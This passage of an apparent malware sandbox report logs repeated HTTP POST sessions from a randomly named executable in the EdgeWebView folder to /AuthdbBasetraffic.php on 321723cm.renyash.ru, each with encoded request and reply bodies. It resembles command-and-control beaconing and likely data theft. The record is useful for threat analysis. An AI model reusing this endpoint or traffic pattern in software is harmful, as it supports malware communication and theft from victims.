                                                                                                                          Dec 26, 2024 22:33:18.410749912 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1904
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:18.758327961 CET1904OUTData Raw: 52 53 58 5c 5b 5d 53 59 5d 58 52 5a 56 54 54 5b 5f 5d 58 42 59 5e 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RSX\[]SY]XRZVTT[_]XBY^Q\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#,?:>,=%5?",81!*::25'"Z=']? ].#[(
                                                                                                                          Dec 26, 2024 22:33:19.916299105 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:20.056112051 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 59 25 3d 02 5b 34 3c 0d 01 3f 39 00 1a 36 3c 31 1b 33 17 37 5a 2b 12 21 03 3c 1d 3e 13 30 03 2a 1b 36 06 24 54 2b 31 33 13 29 36 2b 59 01 1d 23 5c 27 5d 23 01 30 3a 22 03 2d 3c 27 41 3d 08 08 5a 3e 07 27 56 29 05 26 00 20 31 21 09 28 17 04 5c 2e 3f 25 19 28 1e 31 53 30 07 2c 51 02 11 3b 0e 35 31 32 08 21 59 23 0d 28 33 2b 13 22 04 05 0a 31 03 3d 1f 33 3f 32 58 24 3c 22 5b 30 24 2c 1d 30 3b 0f 1a 24 21 27 0d 31 3f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: 'Y%=[4<?96<137Z+!<>0*6$T+13)6+Y#\']#0:"-<'A=Z>'V)& 1!(\.?%(1S0,Q;512!Y#(3+"1=3?2X$<"[0$,0;$!'1? ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.44982237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:18.536690950 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:18.883462906 CET2592OUTData Raw: 57 55 5d 59 5e 5b 56 50 5d 58 52 5a 56 5d 54 50 5f 5b 58 41 59 58 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WU]Y^[VP]XRZV]TP_[XAYXQ]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y;,>?/;=%=+,_ ''=!)"136'Y.Y<71+ ].#[(.
                                                                                                                          Dec 26, 2024 22:33:19.916311979 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:20.156294107 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.44982837.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:20.479254961 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:20.836496115 CET2596OUTData Raw: 52 50 58 5f 5b 5c 53 59 5d 58 52 5a 56 5e 54 5b 5f 59 58 43 59 5d 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RPX_[\SY]XRZV^T[_YXCY]QRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ /?:\)/[)6=Z+,1 ;1=%)-%V5&<!+"Y? ].#[(.
                                                                                                                          Dec 26, 2024 22:33:21.839435101 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:22.091885090 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:19 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.44983337.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:22.334610939 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:22.680565119 CET2596OUTData Raw: 57 5c 5d 58 5e 58 56 5e 5d 58 52 5a 56 5b 54 50 5f 53 58 44 59 5e 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W\]X^XV^]XRZV[TP_SXDY^Q_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#X/,.)>6"?5 <;2=X))"%&'X?'*+ ].#[(:
                                                                                                                          Dec 26, 2024 22:33:23.693007946 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:23.948051929 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:21 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.44983637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:24.190511942 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:24.539581060 CET2596OUTData Raw: 57 55 5d 54 5b 51 56 5f 5d 58 52 5a 56 5a 54 50 5f 53 58 41 59 54 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WU]T[QV_]XRZVZTP_SXAYTQZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8<-*Y=9+Z4??%-:*\>'#)Y3,:^='+? ].#[(


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.44984137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:25.208343983 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:25.555238008 CET1924OUTData Raw: 57 55 5d 5f 5b 5a 53 5b 5d 58 52 5a 56 54 54 52 5f 52 58 45 59 5c 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WU]_[ZS[]XRZVTTR_RXEY\Q]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/.)<>%%Z<1#3Y&])%!Z'??79?? ].#[(
                                                                                                                          Dec 26, 2024 22:33:26.578519106 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:26.836061954 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 5d 32 3d 34 11 34 3f 28 5f 3c 17 2a 56 22 2c 3e 08 24 3a 2f 58 2b 05 39 03 2b 30 2e 1d 27 39 2d 07 21 06 2b 0b 2b 22 34 05 3e 0c 2b 59 01 1d 23 5a 33 05 2c 13 24 29 2e 02 2c 2c 3b 41 3e 08 21 04 2a 07 37 50 2a 3b 31 5a 23 1f 2a 18 2b 00 2a 58 39 12 2e 09 2b 1e 2d 50 24 07 2c 51 02 11 3b 0e 36 0c 25 56 36 59 38 52 2a 30 27 58 36 04 33 0f 31 3d 36 0c 24 5a 25 01 24 2f 3e 58 24 24 30 50 27 5d 32 0a 32 32 28 1f 24 2f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: ']2=44?(_<*V",>$:/X+9+0.'9-!++"4>+Y#Z3,$).,,;A>!*7P*;1Z#*+*X9.+-P$,Q;6%V6Y8R*0'X631=6$Z%$/>X$$0P']222($/ ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.44984237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:25.329893112 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:25.692047119 CET2596OUTData Raw: 57 51 5d 5e 5e 5a 53 5e 5d 58 52 5a 56 58 54 53 5f 5d 58 40 59 5e 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WQ]^^ZS^]XRZVXTS_]X@Y^Q]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#_;,:^>$).?-4<4'.1*623*0?(':[)/ ].#[(6
                                                                                                                          Dec 26, 2024 22:33:26.699253082 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:26.951987982 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.2.44984837.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:27.195086956 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:27.539810896 CET2596OUTData Raw: 57 5d 5d 55 5b 5d 53 59 5d 58 52 5a 56 55 54 5b 5f 5c 58 49 59 5e 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W]]U[]SY]XRZVUT[_\XIY^QZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y/2]?,/)6:?<64$2.>=:-]% "3/>X?2Z)/ ].#[(
                                                                                                                          Dec 26, 2024 22:33:28.557316065 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:28.808119059 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.2.44985437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:29.753412008 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:30.102191925 CET2596OUTData Raw: 57 54 58 5f 5b 5d 53 5a 5d 58 52 5a 56 5c 54 51 5f 5f 58 43 59 5d 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WTX_[]SZ]XRZV\TQ__XCY]QXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;/)Z#?6!)?>4?#%>1>*139$2[<7?? ].#[(&
                                                                                                                          Dec 26, 2024 22:33:31.166614056 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:31.424019098 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:29 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.44985637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:31.683649063 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.44985737.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:31.999331951 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:32.352514982 CET1924OUTData Raw: 52 56 5d 55 5e 5b 56 5b 5d 58 52 5a 56 58 54 56 5f 5a 58 45 59 5c 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RV]U^[V[]XRZVXTV_ZXEY\QXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y/9)<+?&5<?24829>5[2 5&?>?':]( ].#[(6
                                                                                                                          Dec 26, 2024 22:33:32.602044106 CET1236OUTData Raw: 0b 35 0a 17 0f 5f 02 3c 11 30 06 16 32 3c 1f 01 11 2f 20 5e 21 0a 04 35 30 12 22 18 3e 3d 24 23 0b 5b 2d 31 31 00 3a 02 3b 21 5d 06 3a 5b 39 2c 17 26 5e 3c 32 34 2b 21 06 07 5e 01 3c 36 07 26 02 5c 0f 1f 06 2e 0e 04 0f 24 21 23 31 04 06 3d 07 23
                                                                                                                          Data Ascii: 5_<02</ ^!50">=$#[-11:;!]:[9,&^<24+!^<6&\.$!#1=#997<Z<R040^$0.9\6V).$",+ U#33!>U </#8;Q:=&59 3:/"*>]9=.(Z$1:9(8.*8.@23;_!9#>>*;->=.&]?= ?V8;[17%9"]<Y0[P1
                                                                                                                          Dec 26, 2024 22:33:33.412759066 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:33.672297955 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 05 26 13 06 10 20 05 3b 06 3c 07 04 53 22 2c 32 08 24 17 24 03 2b 2c 2e 5e 28 0a 35 0f 27 29 3e 1b 35 3f 38 55 28 0f 05 58 3d 0c 2b 59 01 1d 23 5d 24 28 33 03 30 3a 22 01 39 01 0d 45 3e 18 0f 00 28 3a 2b 50 3d 28 3d 13 37 31 22 17 2a 29 39 03 2e 05 3a 41 28 0e 29 14 24 3d 2c 51 02 11 38 1c 22 32 3d 1d 35 01 37 0e 29 33 19 5f 22 14 33 0a 31 04 3d 54 33 05 2e 1a 27 01 21 02 27 09 09 0e 24 5d 3e 0a 32 32 30 56 24 3f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $& ;<S",2$$+,.^(5')>5?8U(X=+Y#]$(30:"9E>(:+P=(=71"*)9.:A()$=,Q8"2=57)3_"31=T3.'!'$]>220V$? ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.44985837.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:32.363785028 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:32.711555004 CET2596OUTData Raw: 57 55 58 59 5b 50 56 58 5d 58 52 5a 56 5c 54 52 5f 5b 58 40 59 58 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WUXY[PVX]XRZV\TR_[X@YXQRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#\/.\>+Y?5?Z-^7;1[:[()&2 *',!+Q1( ].#[(&
                                                                                                                          Dec 26, 2024 22:33:32.727016926 CET1236OUTData Raw: 07 25 39 00 01 3d 00 43 36 33 14 25 0c 3b 5c 22 36 3f 15 09 3d 56 2e 51 3b 3e 23 2d 2a 22 1e 23 36 5c 0d 2c 39 2c 07 57 3d 03 39 1f 24 00 5a 5e 39 37 33 2a 08 3a 21 01 32 0c 23 51 0f 01 27 1d 3f 30 0d 20 3a 56 1c 26 39 3a 34 3c 3d 05 0d 3b 0c 2d
                                                                                                                          Data Ascii: %9=C63%;\"6?=V.Q;>#-*"#6\,9,W=9$Z^973*:!2#Q'?0 :V&9:4<=;-!=[V;&V3:$8][#26,.(,4!93"(;8$>!1^Y=U:>R!0]#>%>!4*=&-W8>7==;#<;(:1>"\%:?'%$1#\5UV20$98_9989%
                                                                                                                          Dec 26, 2024 22:33:34.154438972 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:34.412189007 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.44986437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
